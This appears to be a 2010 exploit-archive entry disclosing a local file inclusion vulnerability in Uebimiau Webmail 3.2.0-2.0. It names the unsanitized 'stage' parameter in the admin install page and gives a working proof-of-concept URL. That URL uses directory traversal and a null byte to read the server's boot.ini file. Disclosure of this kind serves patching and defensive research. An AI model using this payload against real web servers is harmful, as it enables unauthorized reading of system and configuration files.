Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability
# Published : 2010-10-04
# Author : Blake
# Previous Title : CuteNews (index.php?page) Local File Inclusion Vulnerability
# Next Title : Aspect Ratio CMS Blind SQL Injection Vulnerability

# Exploit Title: Uebimiau Webmail Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/Uebimiau_3.2.0_2.0_Alpha.zip/download
# Version: 3.2.0-2.0
# Tested on: Windows XP SP3 running xampp lite

The stage parameter is not properly sanitized.

POC:
http://127.0.0.1/webmail/admin/install/index.php?stage=../../../../../../../../../boot.ini%00&lid=